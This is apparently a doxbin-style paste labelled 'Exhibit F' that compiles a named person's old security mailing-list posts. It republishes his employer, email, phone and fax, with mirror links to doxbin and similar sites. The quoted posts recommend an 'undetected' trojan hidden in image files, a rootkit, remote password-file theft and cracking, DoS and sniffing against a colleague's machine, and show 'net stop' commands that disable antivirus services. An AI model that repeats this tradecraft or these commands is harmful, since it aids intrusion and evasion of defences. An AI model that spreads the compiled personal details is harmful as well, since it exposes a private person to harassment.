movie is not updated and you're right (I couldn't test it unfortunately).

Anyway, the main point to show the CEO the insecurity of the box is to get
ADMIN privileges over there. Then you can choose the game you wanna play
on that computer.

I'm open to any further suggestion, tnx for yours Eduardo.

Cheers

Marco

             Hi, Marco!

             IMO, I think it's harder to attack a workstation compared to a
server through a network, since servers must have some open port in
listening state. On a workstation the user is the weakest point most of the
time, while on a server there are many other parts to take into account. If
there is a firewall in place (for example, the one that comes with XP SP2),
which attacks are possible through a network? AFAIK just a few. Windows XP
restricts most of the attacks that use anonymous connections. Service Pack 2
restricts even more. If you are a domain admin, there are many
possibilities, but that's not the case here.
             What do you mean by "executing a jpg or a gif file"? I know there
are buffer overflow vulnerabilities that can be exploited when opening an
image, but it's not a trivial attack. I'm not sure (because I didn't try
it), but I think it's even harder to do it when you need to merge an
executable into an image using a joiner. I'd like to know what you think
about it.
             Regarding the hxdef rootkit, you can find it out by using
RootKitRevealer from SysInternals. It's available at
http://www.sysinternals.com/Utilities/RootkitRevealer.html. BTW, hxdef isn't
considered an attack tool. It's used after you successfully got access to a
computer, when you want to hide files, open ports and so on.
             Just my $0.02.
             Regards,

             Eduardo Suzuki
             esuzuki_br@pop.com.br
             Eduardo.AC.Suzuki@gmail.com

"The essential is invisible to the eyes."

-----Original Message-----
From: Marco Monicelli [mailto:marco.monicelli@marcegaglia.com]
Sent: Friday, September 02, 2005 6:12 AM
To: Juan B
Cc: pen-test@securityfocus.com
Subject: Re: Hacking to Xp box
Importance: High

Ciao juan!

If the CEO box is fully patched and FW is enabled, then your mission is a
little bit more difficult to accomplish. Besides, there are thousands of
recent exploits for windows which you can try. For example, did you try the
Universal exploit for the Plug and Play vulnerability? It is published
everywhere. You can try with more recent exploits than the DCOM exploit
which is at least 3 years old.

If you want to try with the trojan, I would suggest you to google for
Bifrost, which is a Remote Administration Tool (you can call it trojan if
you prefer) that is completely UNDETECTED by any AV (at the moment it is
still 100% undetected). You can pack it inside any file (exe, jpg, gif....)
and it will be executed silently and hiddenly. Moreover, Bifrost can bypass
firewalls injecting itself into Explorer.exe process. Another good
UNDETECTED tool is hxdef rootkit.

Arp poisoning could do the job but why not try to steal the SAM file and
to crack it? You can do that remotely if the machine has the ports you
mentioned opened. I bet you know some tool to steal the SAM and to crack
it. I love SAMDUMP for example. ;)

Last but not least, you can try with a Denial of Service to show your CEO
how easily a kid can prevent you from working with a simple DoS.

Why not sniff the network? There are many undetected sniffers around the
Web.

Just my 2 cents ;)

Marco

Hi Guys

Please give me a hand here.

I'm trying to penetrate the CEO box to show him why we
need better security in our company, he told me to
show me how it can be done. he has xp pro sp 2
with all the patches installed and FW enabled but I
can't ! I tried to use metasploit with the ms rpc dcom
exploit but it didn't work. nessus found port 135 139
2000 and ntp are opened and also he can read some smb
shares and also outputted that this host doesn't discard
SYN packets that have the FIN flag set. and port 2000
(callback is open).
what I can try more to break this box? any ideas? I know I
always can try to arp poison his arp table and pass
all the machines traffic through my laptop to capture
some passwords but this is enough. or send him a
trojan but we have a good anti virus protection .

Does some of you have Ideas ?

Thanks a lot !

Juan








Exhibit F:   https://marc.info/?l=bugtraq&m=108991985612069&w=2






List:       bugtraq
Subject:    Trend Micro Officescan for Win2k strange behaviour
From:       Marco Monicelli <marco.monicelli () marcegaglia ! com>
Date:       2004-07-14 9:28:24
Message-ID: OFF477B9CD.96AC5FC0-ONC1256ED1.00334DA6-C1256ED1.00340A3A () marcegaglia ! com





Hello List!

I've noticed the following "weird" behaviour of the Trend Micro Officescan
client vers. 5.58 update to pattern 1.936.00 Engine 7.100 for WinXP/2k/NT:

The AV client is protected for unloading the Realtime Scan agent prompting
for a password (which I don't know of course). Moreover I have NOT admin
rights which allows me to perform a full system scan but not to unload the
client and/or the realtime protection.
Playing with the "net" command on a DOS prompt, I found out that the AV
launches itself and the realtime prot as services automatically. Then I
tried to stop the services with the simple command

net stop "OfficeScanNT Listener"
net stop "OfficeScanNT RealTime Scan"

Guess what? The two services have been successfully stopped from my system.

What do you guys think of this? Should I advise the AV Company of this or
this is normal behaviour?

Tnx for feedback.

Ciao

Marco Monicelli
MARCEGAGLIA SPA
Automotive Sales Department
Stainless Steel Division
Tel. +39 0376 685369
Fax. +39 0376 685625
email: marco.monicelli@marcegaglia.com







----------------------------------------------------------------

Mirrors: 

https://doxbin.org/user/LarpKillaz

https://controlc.com/0b2e78bb

https://skidbin.net/paste/Ug45GeKjMF

https://ghostbin.com/paste/eQ8LT





End of Log

-----------------------------------------------------------------------------







       ~BWA~  



"The House Always Wins"